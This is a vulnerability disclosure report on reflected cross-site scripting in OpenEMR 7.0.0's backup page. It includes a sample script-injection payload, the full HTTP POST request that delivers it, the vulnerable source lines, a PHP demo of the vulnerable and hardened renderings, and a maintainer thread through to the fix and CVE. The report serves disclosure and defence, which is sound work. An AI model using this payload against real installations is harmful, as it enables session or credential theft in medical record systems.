Reflected Cross Site Scripting in OpenEMR 7.0.0 and below at backup in openemr/openemr
Reported on
Jul 19th 2022
Description
We would like to report a vulnerability found during software testing. OpenEMR 7.0.0 (the latest release at the time of writing) and earlier versions of the open-source electronic health records and medical practice management application contain a reflected cross-site scripting vulnerability in the {form_status} parameter of the backup page. The issue has not been reported before (we checked the official CVE website).
Vulnerability Type
Reflected Cross-Site Scripting (XSS)
Affected Page/URL
https://<openemrurl>/interface/main/backup.php {form_status}
Sample XSS Payload
' /><script>alert(`CVE_Hunting_XSS`)</script>
Vulnerable Source Code
/var/www/localhost/htdocs/openemr/interface/main/backup.php (see the Occurrences section below for the affected lines)
Implication
This vulnerability allows an attacker to inject arbitrary JavaScript into the web UI, altering its intended behaviour and potentially disclosing credentials or session data within a trusted session.
Recommendation
Allow-list validation should be performed on the server side for every input field and parameter in the application so that only expected input is processed. Validation should decode any encoded input first and then check length, character set, format and business rules before the value is accepted. Special characters such as `'/;&*()%!+{}[]|#, including carriage return (ASCII 13, \r, %0d) and line feed (ASCII 10, \n, %0a), should be rejected from form fields and hidden form fields before they are processed. Where special characters must be allowed, the application should escape them with a standard function. Input validation is defence in depth; the control that actually stops XSS is output encoding, so every parameter reflected to the browser must be encoded for the context it is written into. For this page, the hidden input at backup.php L1029 writes $form_status unescaped inside a single-quoted value attribute, and the echo nl2br($form_status) calls write it unescaped as element text; the same file already uses the attr()/text()/xlt() escaping helpers for other output (for example text($TAR_FILE_PATH)), and $form_status should be written through them as well. Note also that the captured request carries a csrf_token_form value; if backup.php verifies that token, the reflection can only be triggered by a request that already holds a valid token for the victim's session, which limits but does not remove the risk.
Discoverer/Reporters
- Ammarit Thongthua, Rattapon Jitprajong and Nattakit Intarasorn from Secure D Center Research Team
Example PoC Screenshots
OpenEMR Version 6.1.0
OpenEMR Version 7.0.0
Backup Page
Click Create Backup or Create Eventlog Backup, then inject the sample XSS payload into {form_status} in the resulting POST request:
POST /interface/main/backup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------134273974110212498243185026588
Content-Length: 626
Origin: https://localhost
Connection: close
Referer: https://localhost/interface/main/backup.php
Cookie: OpenEMR=sDB13cXmxjjPS6d-BF8dtr9D5Kj8PkbOg2oMdxqSKMMo1C7Y
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="csrf_token_form"
4a2e4c79d44d123017f7ff6850e337c8c17557e3
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_backup"
ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_step"
ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_status"
' /><script>alert(`CVE_Hunting_XSS`)</script>
-----------------------------134273974110212498243185026588--
Rendered Malicious JavaScript (XSS)
Impact
This vulnerability allows an attacker to inject arbitrary JavaScript into the web UI, altering its intended behaviour and potentially disclosing credentials or session data within a trusted session.
Occurrences
backup.php L945
if ($form_step == 203) {
    $form_status .= xla('Done') . ".";
    echo nl2br($form_status);
}
backup.php L503
if ($form_step == 1) {
    $form_status .= xla('Dumping OpenEMR database') . "...<br />";
    echo nl2br($form_status);
    if (file_exists($TAR_FILE_PATH)) {
        if (! unlink($TAR_FILE_PATH)) {
            die(xlt("Couldn't remove old backup file:") . " " . text($TAR_FILE_PATH));
        }
    }
backup.php L1029
<input type='hidden' name='form_status' value='<?php echo $form_status; ?>' />
backup.php L923
if ($form_step == 202) {
    // Process uploaded config file.
    if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $EXPORT_FILE)) {
            $form_status .= xla('Applying') . "...<br />";
            echo nl2br($form_status);
            $cmd = escapeshellcmd($mysql_cmd) . " -u " . escapeshellarg($sqlconf["login"]) .
                " -p" . escapeshellarg($sqlconf["pass"]) .
                " -h " . escapeshellarg($sqlconf["host"]) .
                " --port=" . escapeshellarg($sqlconf["port"]) .
                " $mysql_ssl " .
                escapeshellarg($sqlconf["dbase"]) .
                " < " . escapeshellarg($EXPORT_FILE);
        } else {
            echo xlt('Internal error accessing uploaded file!');
            $form_step = -1;
        }
    } else {
        echo xlt('Upload failed!');
        $form_step = -1;
    }
    $auto_continue = true;
}
backup.php L549
if ($form_step == 3) {
    $form_status .= xla('Dumping OpenEMR web directory tree') . "...<br />";
    echo nl2br($form_status);
    $cur_dir = getcwd();
    chdir($webserver_root);
backup.php L903
if ($form_step == 103) {
    $form_status .= xla('Done. Will now send download.') . "<br />";
    echo nl2br($form_status);
    $auto_continue = true;
}
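All of the occurrences above follow one pattern: $form_status is read back from the client's POST body, server-generated text is appended, and the result is written unescaped both as element text (through nl2br()) and into the single-quoted value attribute of a hidden input, which is the attribute the sample payload's leading quote breaks out of. The stand-alone PHP script below is an added example, not OpenEMR's code, showing that pattern beside a hardened rendering of the same status. The attr(), text() and xla() bodies here are assumed stand-ins for OpenEMR's helpers in library/htmlspecialchars.inc.php (translation is omitted), and the POST body is constructed from the report's sample payload.

```php
<?php
// Added example, not OpenEMR's code: the $form_status round trip from
// backup.php reduced to a stand-alone script, with the vulnerable rendering
// beside a hardened one. Run with: php form_status_demo.php

// Stand-ins for OpenEMR's escaping helpers. Their bodies are an assumption
// for this demo: attr() escapes for an HTML attribute, text() for element
// text, and xla() is "translate, then attr()" with the translation omitted.
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
function text(string $s): string
{
    return htmlspecialchars($s, ENT_NOQUOTES | ENT_HTML5, 'UTF-8');
}
function xla(string $s): string
{
    return attr($s);
}

// Vulnerable pattern: the status text arrives in the POST body, server text
// is appended, and the result is echoed raw both as element text (nl2br) and
// inside a single-quoted hidden input, as the occurrences above do.
function render_vulnerable(array $post): string
{
    $form_status = $post['form_status'] ?? '';
    $form_status .= xla('Done') . ".";
    $out  = nl2br($form_status);
    $out .= "\n<input type='hidden' name='form_status' value='" . $form_status . "' />";
    return $out;
}

// Hardened pattern: $form_status is kept as plain text (newlines, no markup)
// and escaped separately for each output context. text() runs before nl2br()
// so line breaks survive; attr() in the attribute encodes the single quote
// that the sample payload uses to break out of value='...'.
function render_hardened(array $post): string
{
    $form_status = $post['form_status'] ?? '';
    $form_status .= "Done.";
    $out  = nl2br(text($form_status));
    $out .= "\n<input type='hidden' name='form_status' value='" . attr($form_status) . "' />";
    return $out;
}

// True when a raw, executable script tag survived into the rendered HTML.
function contains_raw_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed request body carrying the report's sample payload.
$post = ['form_status' => "' /><script>alert(`CVE_Hunting_XSS`)</script>"];

echo "--- vulnerable ---\n", render_vulnerable($post), "\n";
echo "--- hardened ---\n", render_hardened($post), "\n";

// Self-check: the vulnerable output reflects the script tag, the hardened one does not.
$ok = contains_raw_script(render_vulnerable($post))
    && !contains_raw_script(render_hardened($post));
echo $ok ? "check passed\n" : "check FAILED\n";
exit($ok ? 0 : 1);
```

Two design points follow from the demo. First, escaping on output only works if $form_status no longer carries markup; the real file appends "<br />" to it, so escaping that value as-is would double-encode the line breaks, which is why the hardened version stores plain text and lets nl2br() add the breaks after escaping. Second, the simplest fix is to stop accepting $form_status from the client at all and rebuild it on the server from $form_step, since the only content it ever legitimately holds is server-generated progress text.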
Thanks for the report. Working on a fix now.
A preliminary fix has been posted in commit 285fb234bd27ea4c46a29f2797edda7f38f1d8db
Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 3-7 weeks. After I do that, then will be ok to make CVE # and make it public.
Thanks!
Just waiting for the go-ahead from the maintainer and then we can assign and publish a CVE for this report 👍
OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.
Dear @Admin, @Jamie Slome, could you please help assign the CVE for this finding? Thanks, and I appreciate your help 👍
@Brady Miller Thanks for your response 👍
CVE assigned and will automatically publish in the next few hours ♥️